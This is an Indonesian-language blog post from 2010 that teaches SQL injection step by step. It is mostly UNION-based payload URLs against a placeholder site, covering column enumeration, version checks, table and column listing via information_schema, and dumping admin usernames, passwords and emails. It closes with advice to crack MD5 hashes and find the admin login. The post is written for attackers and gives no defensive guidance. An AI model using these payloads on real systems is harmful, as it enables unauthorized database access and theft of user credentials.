Nah ini mungkin udeh pada tahu, atau mungkin udeh banyak yang mngerti metode ini, kalo udeh ada silahkan saja yah dilewadkan,:), ini juga serangan attacker yang sering kali digunakan, karena masih banyak sekali site yang vulnerable dengan metode ini, sebelum lebih jauh membahas metode yang satu ini, g ada salahnya kita berkenalan dengan metode ini, karena ada pepatah, ga kenal maka g tahu(jayus loh..gpp yang penting metal..:p).
Sql injection adalah metode web attack dengan melakukan pemberian karakter2 khusus diURL target...
Example :
http://serang.org.sql.php?inject=20'
nah kan diberikan tanda petik tuh, kalo ada pesan error, berarti web tersebut vulnerable dengan sql injection...
kemudian kita bisa mencari kolom keberapa yang mengalami masalah...
Example :
http://serang.org/sql.php?injection=10 order by 1--
http://serang.org/sql.php?injection=10 order by 5--
atau metode lain,
http://serang.org/sql.php?injection=-10 union all select 1--
http://serang.org/sql.php?injection=-10 union all select 1,2--
http://serang.org/sql.php?injection=-10 union all select 1,2,3-
dan seterusnya atau juga bisa,
http://serang.org/sql.php?injection=10 and 1=2 union all select 1--
http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2--
http://serang.org/sql.php?injection=10 and 1=2 union all select 1,2,3--
dan seterusnya sampe keluar kolom yang bermasalahnya ok...
nah kalo gitu, karena ini cuma contoh,kita anggap yang keluar adalah kolom ke 3
setelah itu kita bisa mengecek versi sqlnya
http://serang.org/sql.php?injection=-10 union all select 1,2,version(),4,5--
atau
http://serang.org/sql.php?injection=-10 union all select 1,2,@@version,4,5--
kalo seandainya yang keluar versi 4.x.x, maka lewadkan saja, kalo mau dipaksa bisa sih, tapi harus tebak2 tabel dan kolom,hehehe, kalo seandainya yang keluar versi 5.x.x , mari lanjutkan.
untuk mencari tabel yang terdapat dalam site tersebut,
http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=databasae()--
inget file yang penting adalah:
group_concat(table_name)
<< == untuk mencari table dari database yang ada.
from information_schema.tables where table_schema=database
< == diletakan di angka terakhir yang kita dapatkan (lihad contoh diatas)
ok, sekarang kita dapet tabelnya nih, misalnya isi tabelnya sebagai berikut:
admin
user
forum
berita
polling
nah stelah dapet itu selanjutnya kita harus tahu, apa saja sih yang ada didalam tabel itu, tapi tabel yang ingin dicari harus terlebih dahulu kita konvert ke ASCII
http://serang.org/sql.php?injection=-10 union all select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646D696E--
61646D696E = admin = dari string kita rubah ke ASCII dengan menambahkan 0xASCII
setelah kita dapet kolomnya, sekarang saatnya kita dump itu kolom, misalkan kolom yang terdapat pada tabel adalah:
id
username
password
email
nah kan udeh tahu kan, dumping deh...
http://serang.org/sql.php?injection=-10 union all select group_concat(id,0x3a,username,0x3a,password,0x3a,email) from admin--
Nah selesai deh, username n password ada ditangan anda, kalo seandainya password yang kita dapet di encrypt dengan md5 silahkan crack saja yah, banyak ko crackan buat md5 yang online tool sekarang..kalo saya sih lebih suka pake toolnya si gunslinger yang md5 cracking, enak tuh...sering dapet..sekalian w promosiin gunslinger tool loh, ok, setelah berhasil di crack atau dapet password dan usernamenya, silahkan cari halaman adminnya......
Senin, 01 Februari 2010
Langganan:
Posting Komentar (Atom)
Tidak ada komentar:
Posting Komentar